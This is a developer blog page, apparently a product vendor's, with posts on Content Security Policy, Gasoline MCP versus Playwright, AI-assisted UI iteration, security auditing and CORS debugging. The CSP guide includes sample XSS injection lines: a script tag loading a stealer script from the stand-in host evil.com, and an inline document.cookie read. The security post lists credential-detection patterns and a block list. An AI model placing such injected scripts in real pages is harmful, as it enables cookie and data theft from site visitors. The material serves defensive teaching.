Skip to content

Blog

Content Security Policy (CSP) Guide for Web Developers

Content Security Policy is one of the most effective defenses against XSS attacks, but it’s also one of the most confusing security headers to configure. Get it wrong and your site breaks. Get it right and an entire class of attacks becomes impossible.

Here’s a practical guide to CSP — what it does, how to build one, and how to use Gasoline to generate a policy from your actual traffic.

CSP tells the browser which sources are allowed to load resources on your page. If a script tries to load from an origin not in your policy, the browser blocks it.

Without CSP, an XSS vulnerability means an attacker can:

  • Load scripts from any domain (<script src="https://evil.com/steal.js">)
  • Execute inline JavaScript (<script>document.cookie</script>)
  • Inject styles that hide or modify content

With CSP, even if an attacker injects HTML, the browser refuses to execute scripts or load resources from unauthorized origins.

CSP is delivered as an HTTP response header:

Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com; style-src 'self' 'unsafe-inline'

Or as a <meta> tag (with some limitations):

<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' https://cdn.example.com">

Each directive controls a resource type:

DirectiveControlsExamples
default-srcFallback for all resource types'self'
script-srcJavaScript'self' https://cdn.jsdelivr.net
style-srcCSS'self' 'unsafe-inline'
img-srcImages'self' https: data:
font-srcWeb fonts'self' https://fonts.gstatic.com
connect-srcXHR, fetch, WebSocket'self' https://api.example.com wss://ws.example.com
frame-srcIframes'self' https://www.youtube.com
media-srcAudio and video'self'
worker-srcWeb Workers, Service Workers'self'
object-srcPlugins (Flash, Java)'none'
base-uri<base> element'self'
form-actionForm submission targets'self'

If a specific directive isn’t set, default-src is used as the fallback.

ValueMeaning
'self'Same origin as the page
'none'Block everything
'unsafe-inline'Allow inline scripts/styles (weakens XSS protection)
'unsafe-eval'Allow eval(), new Function() (weakens XSS protection)
https:Any HTTPS origin
data:Data URIs (data:image/png;base64,...)
https://cdn.example.comSpecific origin
*.example.comWildcard subdomain
'nonce-abc123'Scripts/styles with matching nonce attribute
'sha256-...'Scripts/styles with matching hash
Content-Security-Policy: default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self'; font-src 'self'; connect-src 'self'

This allows only same-origin resources. Everything else is blocked.

Using a CDN for scripts? Add it:

script-src 'self' https://cdn.jsdelivr.net

Using Google Fonts? Add both origins:

style-src 'self' https://fonts.googleapis.com
font-src 'self' https://fonts.gstatic.com

API on a different domain? Add it to connect-src:

connect-src 'self' https://api.myapp.com

Not sure your policy is correct? Use Content-Security-Policy-Report-Only instead:

Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self'; report-uri /csp-reports

The browser logs violations but doesn’t block anything. Review the reports, adjust the policy, then switch to enforcement.

The biggest challenge with CSP is knowing which origins your page actually loads resources from. A modern web application might use:

  • Your own CDN for static assets
  • Google Fonts for typography
  • A JavaScript CDN (jsdelivr, unpkg, cdnjs)
  • An analytics service (Google Analytics, Segment)
  • A payment processor (Stripe)
  • An error tracker (Sentry)
  • Social media embeds
  • Ad networks

You could audit every <script>, <link>, <img>, and fetch() call in your codebase. Or you could let Gasoline do it.

Gasoline observes all network traffic during your browsing session and generates a CSP from what it sees:

generate({format: "csp"})

Strict — only high-confidence origins (observed 3+ times from 2+ pages):

generate({format: "csp", mode: "strict"})

This gives you the tightest possible policy. If a script was only loaded once, it might be ad injection or a browser extension — strict mode excludes it.

Moderate — includes medium-confidence origins:

generate({format: "csp", mode: "moderate"})

Good for most production use cases.

Report-Only — generates a Content-Security-Policy-Report-Only header:

generate({format: "csp", mode: "report_only"})

Deploy this first to find violations before enforcing.

Gasoline automatically excludes:

  • Browser extension origins (chrome-extension://, moz-extension://) — these shouldn’t be in your CSP
  • Development server origins — localhost on a different port than your app
  • Low-confidence origins — observed only once on one page (likely noise)

Don’t want analytics in your CSP? Exclude it:

generate({format: "csp", mode: "strict",
exclude_origins: ["https://analytics.google.com", "https://www.googletagmanager.com"]})

The output includes:

  • Ready-to-use header string — copy-paste into your server config
  • Meta tag equivalent — for static sites
  • Per-origin details — which directive each origin maps to, confidence level, observation count
  • Filtered origins — what was excluded and why
  • Warnings — e.g., “only 3 pages observed — visit more pages for broader coverage”
script-src 'self' 'unsafe-inline'

This defeats the purpose of CSP for scripts. Inline scripts are the primary XSS vector. Use nonces or hashes instead:

<!-- Server generates a unique nonce per request -->
<script nonce="abc123">
// This script is allowed
</script>
script-src 'self' 'nonce-abc123'

Your page loads fine, but all API calls fail. connect-src controls fetch/XHR destinations — if your API is on a different origin, you need to allow it.

script-src 'self' https:

This allows scripts from any HTTPS origin. An attacker can host a script on any HTTPS server and your CSP won’t block it. Be specific about which origins you allow.

Deploying a new CSP without testing breaks things. Always start with Content-Security-Policy-Report-Only, check for violations, then switch to enforcement.

Even in 2026, you should explicitly block plugins:

object-src 'none'

This prevents Flash and Java plugin exploitation (still a vector in some corporate environments).

Next.js uses inline scripts for hydration. You’ll need nonce-based CSP:

middleware.ts
export function middleware(request) {
const nonce = crypto.randomUUID();
const csp = `script-src 'self' 'nonce-${nonce}'; style-src 'self' 'unsafe-inline';`;
// Pass nonce to components via headers
}

CRA inlines a runtime chunk. Either:

  • Disable inline runtime: INLINE_RUNTIME_CHUNK=false
  • Use hash-based CSP for the known inline script

Vite’s dev server uses inline scripts and HMR WebSocket. Dev CSP will differ from production.

  1. Browse your app through its main flows with Gasoline connected
  2. Generate a CSP: generate({format: "csp", mode: "report_only"})
  3. Deploy in report-only mode and monitor for violations
  4. Adjust — add any legitimate origins that were missed
  5. Switch to enforcement once violations are resolved
  6. Regenerate periodically as your dependencies change

Gasoline takes the guesswork out of step 1 — you don’t have to audit your codebase manually. It sees every origin your page communicates with and builds the policy from observation.

Gasoline MCP vs Playwright: When to Use Which

Gasoline and Playwright aren’t competitors — they’re complementary. Playwright is a browser automation library for writing repeatable test scripts. Gasoline is an AI-powered browser observation and control layer. Gasoline can even generate Playwright tests.

But they serve different purposes, and knowing when to use each saves significant time.

Gasoline MCPPlaywright
InterfaceNatural language via AIJavaScript/TypeScript/Python API
Who uses itDevelopers, PMs, QA — anyoneDevelopers and QA engineers
SetupInstall extension + npx gasoline-mcpnpm init playwright@latest
SelectorsSemantic (text=Submit, label=Email)CSS, XPath, role, text, test-id
Test creationDescribe in EnglishWrite code
ExecutionAI runs it interactivelyCLI or CI/CD pipeline
DebuggingReal-time browser observationTrace viewer, screenshots
MaintenanceAI adapts to UI changesManual selector updates
CI/CDGenerate Playwright tests → run in CINative CI/CD support
ObservabilityConsole, network, WebSocket, vitals, a11yLimited (what you assert)
PerformanceBuilt-in Web Vitals + perf_diffManual performance assertions
CostFree, open sourceFree, open source

You’re checking if a feature works. You don’t want to write a script — you want to try it.

Playwright: Write a script, run it, read the output, modify, repeat.

Gasoline: “Go to the checkout page, add two items, and complete the purchase. Tell me if anything breaks.”

For one-off verification, natural language is 10x faster.

Your test failed. Now what?

Playwright: Open the trace viewer. Scrub through screenshots. Check the assertion error message. Maybe add console.log statements to the test and re-run.

Gasoline: The AI already sees everything — console errors, network responses, WebSocket state, performance metrics. It can diagnose while testing.

observe({what: "error_bundles"})

One call returns the error with its correlated network requests and user actions. No trace viewer needed.

A designer renamed “Submit” to “Place Order” and restructured the form.

Playwright: Tests fail. You update selectors manually across 15 test files. You hope you caught them all.

Gasoline: The AI reads the page, finds the new button text, and continues. No manual updates.

A product manager wants to verify the user flow before release.

Playwright: Not an option without JavaScript knowledge.

Gasoline: “Walk through the signup flow and make sure it works.” The PM can do this themselves.

Playwright tests only check what you explicitly assert. If you don’t assert “no console errors,” you’ll never know about them.

Gasoline observes everything passively:

  • Console errors the test didn’t check for
  • Slow API responses the test didn’t measure
  • Layout shifts the test didn’t detect
  • Third-party script failures the test couldn’t see

Playwright: You can measure timing with custom code, but there’s no built-in Web Vitals collection or before/after comparison.

Gasoline: Web Vitals are captured automatically. Navigate or refresh, and you get a perf_diff with deltas, ratings, and a verdict. No custom code.

Playwright tests run headlessly in GitHub Actions, GitLab CI, or any CI system. They’re deterministic, repeatable, and fast.

Gasoline generates Playwright tests, but the actual CI execution is Playwright’s domain. Gasoline runs interactively with an AI assistant — it’s not designed to be a CI test runner.

Playwright can shard tests across multiple workers and run them in parallel. For a suite of 500 tests, this means finishing in minutes instead of hours.

Gasoline is single-session — one AI, one browser, one tab at a time.

Playwright supports Chromium, Firefox, and WebKit out of the box.

Gasoline’s extension currently runs in Chrome/Chromium only.

When you need a test that passes or fails the exact same way every time, Playwright’s explicit assertions are the right tool:

await expect(page.getByRole('heading')).toHaveText('Welcome back');
await expect(response.status()).toBe(200);

AI-driven testing is intelligent but non-deterministic — the AI might take different paths or interpret “verify it works” differently across runs.

Playwright can intercept and mock network requests, letting you test error states, slow responses, and edge cases without a real backend.

Gasoline observes real traffic — it doesn’t mock it.

The Best of Both: Generate Playwright from Gasoline

Section titled “The Best of Both: Generate Playwright from Gasoline”

The power move: use Gasoline for exploration and Playwright for CI.

"Walk through the checkout flow — add an item, go to cart, enter
shipping info, and complete the purchase."

The AI runs the flow interactively, handling UI variations and reporting issues in real time.

"Generate a Playwright test from this session."
generate({format: "test", test_name: "checkout-flow",
base_url: "http://localhost:3000",
assert_network: true,
assert_no_errors: true,
assert_response_shape: true})

Gasoline produces a complete Playwright test:

import { test, expect } from '@playwright/test';
test('checkout-flow', async ({ page }) => {
const consoleErrors = [];
page.on('console', msg => {
if (msg.type() === 'error') consoleErrors.push(msg.text());
});
await page.goto('http://localhost:3000/products');
await page.getByRole('button', { name: 'Add to Cart' }).click();
await page.getByRole('link', { name: 'Cart' }).click();
await page.getByLabel('Address').fill('123 Main St');
// ...
expect(consoleErrors).toHaveLength(0);
});

The generated test runs in your CI pipeline like any other Playwright test. Deterministic, repeatable, fast.

The UI changed and the Playwright test fails. Instead of manually updating selectors:

"The checkout test is failing because the form changed.
Walk through the checkout flow again and generate a new test."

The AI adapts to the new UI, generates a fresh Playwright test, and you’re back in CI.

ScenarioUse
Quick feature verificationGasoline
CI/CD regression suitePlaywright (generated by Gasoline)
Debugging a test failureGasoline (better observability)
Non-developer testingGasoline
Cross-browser testingPlaywright
Performance monitoringGasoline (built-in vitals)
Network mockingPlaywright
Accessibility auditingGasoline (built-in axe-core)
Exploratory testingGasoline
500+ test parallel executionPlaywright
Test maintenanceGasoline (regenerate broken tests)
  1. Develop — use Gasoline for real-time debugging and quick validation
  2. Generate — convert validated flows to Playwright tests
  3. CI — run Playwright tests on every push
  4. Maintain — when tests break, re-explore with Gasoline and regenerate

Gasoline doesn’t replace Playwright. It makes Playwright tests easier to create, easier to maintain, and easier to debug when they fail.

High-Speed AI-Driven Product Development with Gasoline MCP

What if your AI could see the UI, react to issues in real time, and tighten the feedback loop from “something looks wrong” to “it’s fixed” to under a minute? That’s the development speed Gasoline enables.

The speed of software development is the speed of feedback loops. How fast can you go from:

  • Idea to prototype?
  • Code change to visual result?
  • Bug report to fix deployed?
  • “This looks wrong” to “now it looks right”?

Every great product development methodology — agile, lean, continuous deployment — is fundamentally about making these loops shorter. The faster you iterate, the better the product gets.

AI coding agents just compressed the “code change” part of the loop from hours to seconds. But there’s a gap: the AI can write code fast, but it can’t see the result. It pushes a fix and then asks you, “Did that work?” You check the browser, describe what you see, and the loop slows back down to the speed of human communication.

Gasoline closes that gap. The AI sees the browser. The loop runs at machine speed.

Real-Time React: See It, Fix It, Verify It

Section titled “Real-Time React: See It, Fix It, Verify It”

Here’s what a high-speed development session looks like with Gasoline:

You: “The signup form looks broken on mobile. Fix it.”

AI observes the page:

observe({what: "screenshot"})
observe({what: "errors"})
observe({what: "vitals"})

The AI sees the screenshot — the form is overflowing its container, the submit button is off-screen. It sees a CSS warning in the console. It notes the LCP is 4.2s (should be under 2.5s).

AI diagnoses: “The form container has max-width: 600px but no horizontal padding. On screens narrower than 600px, the content bleeds. The submit button has position: absolute with a fixed top that pushes it below the viewport on mobile.”

AI writes the fix. Updates the CSS — adds responsive padding, changes the button positioning to relative.

AI verifies the fix:

observe({what: "screenshot"})
observe({what: "errors"})
observe({what: "vitals"})

The AI sees the updated screenshot — form fits the viewport, button is visible. No new errors. LCP dropped to 1.8s.

Total time: under 60 seconds. The AI saw the problem, understood the visual context, wrote the fix, and verified it — all without you describing anything beyond “looks broken on mobile.”

Traditional AI coding assistants are blind to the visual result of their work. They can reason about code, but they can’t reason about what the code looks like when rendered.

With Gasoline, the AI becomes design-aware:

observe({what: "screenshot"})

The AI takes a screenshot after every significant change. It can compare before and after, catch layout regressions, verify that a modal actually appeared, confirm that an error banner is gone.

observe({what: "vitals"})

Every navigation and interaction includes Web Vitals. The AI knows if a change improved or degraded LCP, CLS, or INP. No separate performance testing step — it’s built into the development loop.

observe({what: "errors"})

After every change, the AI checks for console errors. A CSS change that accidentally breaks a JavaScript selector? Caught immediately. A component that throws on re-render? Caught before you even look at the page.

interact({action: "list_interactive"})

The AI can verify that all expected interactive elements are present, visible, and accessible after a change. Did the redesign accidentally hide a button? The AI knows.

Here’s where it gets powerful. You’re not just fixing bugs — you’re refining the product at high speed.

You: “The dashboard feels cluttered. Make it cleaner.”

The AI screenshots the page, identifies the visual elements, and starts making targeted changes:

  1. Increases whitespace between sections
  2. Reduces the number of visible metrics (hides secondary ones behind a toggle)
  3. Simplifies the header
  4. Screenshots after each change to compare

You: “Better, but the chart is too small now.”

The AI adjusts, screenshots, verifies. Three iterations in the time it would have taken to write one Jira ticket describing the problem.

This is the Loveable model of development — rapid visual iteration where the AI handles implementation and you guide the direction. Every critique becomes a fix becomes a verification in under a minute.

The AI doesn’t just respond to your feedback — it proactively catches issues through Gasoline’s continuous capture:

The AI monitors observe({what: "errors"}) and observe({what: "vitals"}) as you browse. It can interrupt with: “I noticed a new TypeError appearing on the settings page — it started after the last commit. Want me to investigate?”

Run your natural language test scripts against production:

1. Navigate to the homepage
2. Verify no console errors
3. Verify LCP is under 2.5 seconds
4. Click "Sign Up"
5. Verify the form loads without errors
6. Navigate to /dashboard
7. Verify the WebSocket connects successfully

If anything regresses, the AI has the full context: the error, the network state, the visual state, the performance metrics. It can start debugging before you even know there’s a problem.

Take a screenshot on desktop, then tell the AI to check the responsive viewport:

interact({action: "execute_js",
script: "window.innerWidth + 'x' + window.innerHeight"})

The AI can systematically check different viewport sizes and report visual issues at each breakpoint.

Each individual capability — screenshots, error checking, Web Vitals, interactive element discovery — is useful on its own. But the compound effect is what transforms development speed:

Traditional LoopGasoline Loop
Write codeWrite code
Switch to browserAI checks browser automatically
Visually inspectAI analyzes screenshot
Open DevTools if something looks wrongAI already checked errors
Check Network tabAI already checked network
Describe problem to AIAI already knows the problem
Wait for AI suggestionAI already wrote the fix
Apply fix, repeatFix is applied, verified, and committed

The traditional loop has 8 steps with human bottlenecks at each one. The Gasoline loop has 3 steps that run at machine speed.

Designers and PMs become directly effective. They describe what they want in natural language. The AI implements and verifies it in real time. The feedback loop between “I want this to look different” and “it looks different” drops from days (designer → Jira ticket → engineer → PR → deploy → review) to minutes.

Engineers focus on architecture, not pixel-pushing. The AI handles the visual iteration while engineers work on the hard problems — data models, system design, performance optimization, security.

QA shifts from catching bugs to preventing them. When the AI verifies every change visually and functionally in real time, bugs get caught at the moment they’re introduced — not three sprints later when QA runs the regression suite.

Product velocity compounds. Faster feedback loops mean more iterations per day. More iterations mean better product quality. Better quality means less time spent on bugs and more time on features. The cycle accelerates.

The gap between “AI can write code” and “AI can build products” is context. An AI that can see the browser, check the errors, verify the visuals, and confirm the performance isn’t just a coding assistant — it’s a development partner that operates at the speed you think.

Gasoline provides that context. Four tools, zero setup, everything the AI needs to see your product the way your users see it.

The fastest development teams in the world will be the ones where the feedback loop runs in seconds, not days. That future starts with giving the AI eyes.

How Gasoline MCP Improves Your Application Security

Most developers discover security issues in production. A penetration test finds exposed credentials in an API response. A security review flags missing headers. A breach notification reveals that a third-party script was exfiltrating form data.

Gasoline MCP flips the timeline. Your AI assistant audits security while you develop, catching issues before they ship.

In the typical development cycle, security checks happen late:

  1. Development — features built, tested, deployed
  2. Security review — weeks later, if at all
  3. Penetration test — quarterly, expensive, findings arrive after context is lost
  4. Incident — the worst time to learn about a vulnerability

Every step between writing the code and finding the issue adds cost. A missing HttpOnly flag caught during development takes 30 seconds to fix. The same flag caught in a pen test takes a meeting, a ticket, a sprint, and a deploy.

Real-Time Security Auditing During Development

Section titled “Real-Time Security Auditing During Development”

Gasoline gives your AI assistant six categories of security checks that run against live browser traffic:

Your AI can scan every network request and response for exposed secrets:

observe({what: "security_audit", checks: ["credentials"]})

This catches:

  • AWS Access Keys (AKIA...) in API responses
  • GitHub PATs (ghp_..., ghs_...) in console logs
  • Stripe keys (sk_test_..., sk_live_...) in client-side code
  • JWTs in URL parameters (a common mistake)
  • Bearer tokens in responses that shouldn’t contain them
  • Private keys accidentally bundled in source maps

Every detection runs regex plus validation (Luhn algorithm for credit cards, structure checks for JWTs) to minimize false positives.

observe({what: "security_audit", checks: ["pii"]})

Finds personal data flowing through your application:

  • Social Security Numbers
  • Credit card numbers (with Luhn validation — not just pattern matching)
  • Email addresses in unexpected API responses
  • Phone numbers in contexts where they shouldn’t appear

This matters for GDPR, CCPA, and HIPAA compliance. If your user list API is returning full SSNs when the frontend only needs names, your AI catches it during development.

observe({what: "security_audit", checks: ["headers"]})

Validates that your responses include critical security headers:

HeaderWhat It Prevents
Strict-Transport-SecurityDowngrade attacks, cookie hijacking
X-Content-Type-OptionsMIME sniffing attacks
X-Frame-OptionsClickjacking
Content-Security-PolicyXSS, injection attacks
Referrer-PolicyReferrer leakage to third parties
Permissions-PolicyUnauthorized browser feature access

Missing any of these? Your AI knows immediately — and can fix it.

observe({what: "security_audit", checks: ["cookies"]})

Session cookies without HttpOnly are accessible to XSS attacks. Cookies without Secure can be intercepted over HTTP. Missing SameSite enables CSRF. Gasoline checks every cookie against every flag and rates severity based on whether it’s a session cookie.

observe({what: "security_audit", checks: ["transport"]})

Detects:

  • HTTP usage on non-localhost origins (unencrypted traffic)
  • Mixed content (HTTPS page loading HTTP resources)
  • HTTPS downgrade patterns
observe({what: "security_audit", checks: ["auth"]})

Identifies API endpoints that return PII without requiring authentication. If /api/users/123 returns a full user profile without an Authorization header, that’s a finding.

Third-party scripts are one of the largest attack surfaces in modern web applications. Every <script src="..."> from an external CDN is a trust decision.

observe({what: "third_party_audit"})

Gasoline classifies every third-party origin by risk:

  • Critical risk — scripts from suspicious domains, data exfiltration patterns
  • High risk — scripts from unknown origins, data sent to third parties with POST requests
  • Medium risk — non-essential third-party resources, suspicious TLDs (.xyz, .top, .click)
  • Low risk — fonts and images from known CDNs

It detects domain generation algorithm (DGA) patterns — high-entropy hostnames that indicate malware communication. It flags when your application sends PII-containing form data to third-party origins.

And it’s configurable. Specify your first-party origins and custom allow/block lists:

observe({what: "third_party_audit",
first_party_origins: ["https://api.myapp.com"],
custom_lists: {
allowed: ["https://cdn.mycompany.com"],
blocked: ["https://suspicious-tracker.xyz"]
}})

Security isn’t just about finding issues — it’s about making sure fixes stay fixed.

// Before your deploy
configure({action: "diff_sessions", session_action: "capture", name: "before-deploy"})
// After
configure({action: "diff_sessions", session_action: "capture", name: "after-deploy"})
// Compare
configure({action: "diff_sessions",
session_action: "compare",
compare_a: "before-deploy",
compare_b: "after-deploy"})

The security_diff mode specifically tracks:

  • Headers removed — did someone drop the CSP header?
  • Cookie flags removed — did HttpOnly get lost in a refactor?
  • Authentication removed — did an endpoint become public?
  • Transport downgrades — did something switch from HTTPS to HTTP?

Each change is severity-rated. A removed CSP header is high severity. A transport downgrade is critical.

Gasoline doesn’t just find problems — it generates the artifacts you need to fix and prevent them.

generate({format: "csp", mode: "strict"})

Gasoline observes which origins your page actually loads resources from during development and generates a CSP that allows exactly those origins — nothing more. It uses a confidence scoring system (3+ observations from 2+ pages = high confidence) to filter out extension noise and ad injection.

generate({format: "sri"})

Every third-party script and stylesheet gets a SHA-384 hash. If a CDN is compromised and serves modified JavaScript, the browser refuses to execute it.

The output includes ready-to-paste HTML tags:

<script src="https://cdn.example.com/lib.js"
integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8w"
crossorigin="anonymous"></script>

Even before auditing, Gasoline protects against accidental data exposure. The redaction engine automatically scrubs sensitive data from all MCP tool responses before they reach the AI:

  • AWS keys become [REDACTED:aws-key]
  • Bearer tokens become [REDACTED:bearer-token]
  • Credit card numbers become [REDACTED:credit-card]
  • SSNs become [REDACTED:ssn]

This is a double safety net. The extension strips auth headers before data reaches the server. The server’s redaction engine catches anything else before it reaches the AI. Two layers, zero configuration.

Here’s the workflow that makes Gasoline transformative for security:

  1. Develop normally — write code, test features
  2. AI audits continuously — security checks run against live traffic
  3. Issues found immediately — in the same terminal where you’re coding
  4. Fix in context — the AI has the code open and the finding in hand
  5. Verify the fix — re-run the audit, confirm the finding is gone
  6. Prevent regression — capture a security snapshot, compare after future changes

The entire cycle takes minutes, not months. No separate tool. No context switch. No ticket in a backlog that nobody reads.

For developers: Security becomes part of your flow, not an interruption to it. The AI catches what you’d need a security expert to find — and you fix it while the code is still fresh in your mind.

For security teams: Shift-left isn’t a buzzword anymore. Developers arrive at security review with most issues already caught and fixed. Reviews focus on architecture and design, not missing headers.

For compliance: Every audit finding is captured with timestamp, severity, and evidence. SARIF export integrates directly with GitHub Code Scanning. The audit log records every security check the AI performed.

For enterprises: Zero data egress. All security scanning happens on the developer’s machine. No credentials sent to cloud services. No browser traffic leaving the network. Localhost only, zero dependencies, open source.

Install Gasoline, open your application, and ask your AI:

“Run a full security audit of this page and tell me what you find.”

You might be surprised what’s been hiding in plain sight.

How to Debug CORS Errors with AI Using Gasoline MCP

CORS errors are the most misleading errors in web development. The browser tells you “access has been blocked” — but the actual problem could be a missing header, a wrong origin, a preflight failure, a credentials mismatch, or a server that’s simply crashing and returning a 500 without CORS headers.

Here’s how to use Gasoline MCP to let your AI assistant see the full picture and fix CORS issues in minutes instead of hours.

The browser console shows you something like:

Access to fetch at 'https://api.example.com/users' from origin 'http://localhost:3000'
has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present
on the requested resource.

This tells you what happened but not why. Common causes:

  1. The server doesn’t send CORS headers at all — needs configuration
  2. The server sends the wrong origin* doesn’t work with credentials
  3. The preflight OPTIONS request fails — the server doesn’t handle OPTIONS
  4. The server errors out — a 500 response won’t have CORS headers either
  5. A proxy strips headers — nginx, Cloudflare, or your reverse proxy eats the headers
  6. Credentials mode mismatchwithCredentials: true requires explicit origin, not *

Chrome DevTools shows the failed request in the Network tab, but the response body is hidden for CORS-blocked requests. You can’t see what the server actually returned. You’re debugging blind.

With Gasoline connected, your AI can see the error, the network request details, and the response headers — everything needed to diagnose the root cause.

observe({what: "errors"})

The AI sees the CORS error message with the exact URL, origin, and which header is missing.

observe({what: "network_bodies", url: "/api/users"})

This shows the full request/response pair:

  • Request headers — the Origin header the browser sent
  • Response headers — whether Access-Control-Allow-Origin is present, and what value it has
  • Response status — is it a 200 with missing headers, or a 500 that also lacks headers?
  • Response body — the actual error payload (which Chrome hides for CORS failures)
observe({what: "network_waterfall", url: "/api/users"})

The waterfall shows if there are two requests — the preflight OPTIONS and the actual request. If the OPTIONS request fails or returns the wrong status, the browser never sends the real request.

observe({what: "timeline", include: ["network", "errors"]})

The timeline shows the sequence: did the preflight succeed? Did the main request fire? When did the error appear relative to the request? This catches timing-related CORS issues like the server sending headers on GET but not POST.

What the AI sees: Request to api.example.com, response status 200, no Access-Control-Allow-Origin header.

The fix: Add CORS headers to the server. The AI can look at your server code and add the appropriate middleware:

// Express
app.use(cors({ origin: 'http://localhost:3000' }));
// Go
w.Header().Set("Access-Control-Allow-Origin", "http://localhost:3000")
// Nginx
add_header 'Access-Control-Allow-Origin' 'http://localhost:3000';

What the AI sees: Request to /api/users, response status 500, body contains {"error": "database connection failed"}, no CORS headers.

The real problem: The server is crashing, and crash responses don’t go through the CORS middleware. The CORS error is a red herring.

This is why seeing the response body matters. Without Gasoline, you’d spend an hour debugging CORS headers when the actual issue is a database connection string.

What the AI sees: Two requests in the waterfall — an OPTIONS request returning 404, and no follow-up request.

The fix: The server doesn’t handle OPTIONS requests for that route. Add an OPTIONS handler or configure your framework’s CORS middleware to handle preflight requests.

What the AI sees: Response has Access-Control-Allow-Origin: *, request has credentials: include. Error says “wildcard cannot be used with credentials.”

The fix: Replace * with the specific origin. The AI can read the Origin header from the request and configure the server to echo it back (with a whitelist).

What the AI sees: Server code sends CORS headers (the AI can read the source), but the response in the browser doesn’t have them.

Diagnosis: Something between the server and browser is stripping headers. The AI checks nginx configs, Cloudflare settings, or reverse proxy configuration.

Here’s what it looks like end-to-end:

You: “I’m getting a CORS error when calling the API.”

The AI:

  1. Calls observe({what: "errors"}) — sees the CORS error with URL and origin
  2. Calls observe({what: "network_bodies", url: "/api"}) — sees the actual response (a 500 with a database error)
  3. Reads the server code — finds the missing error handler that skips CORS middleware
  4. Fixes the error handler to pass through CORS middleware even on errors
  5. Calls interact({action: "refresh"}) — reloads the page
  6. Calls observe({what: "errors"}) — confirms the CORS error is gone

Total time: 2 minutes. No manual DevTools inspection. No guessing about headers. No Stack Overflow rabbit holes.

Chrome DevTools has a fundamental limitation for CORS debugging: it hides the response body for CORS-blocked requests. The Network tab shows the request was blocked, but you can’t see what the server actually returned.

This means you can’t tell the difference between:

  • A correctly configured server that’s missing one header
  • A server that’s completely crashing and returning a 500

Gasoline captures the response at the network level before CORS enforcement, so the AI sees everything — headers, body, status code. The diagnosis goes from “something is wrong with CORS” to “the server returned a 500 because the database is down, and the error handler doesn’t set CORS headers.”

Check the timeline, not just the error. CORS errors sometimes cascade — one failed preflight blocks ten subsequent requests. The timeline shows the cascade pattern so you fix the root cause, not the symptoms.

Look at both staging and production headers. CORS works in staging with * but breaks in production with credentials? The network bodies show exactly which headers each environment returns.

Watch for mixed HTTP/HTTPS. http://localhost:3000 and https://localhost:3000 are different origins. The AI’s transport security check (observe({what: "security_audit", checks: ["transport"]})) catches this mismatch.

Use error_bundles for context. observe({what: "error_bundles"}) returns the CORS error along with the correlated network request and recent actions — everything in one call instead of three.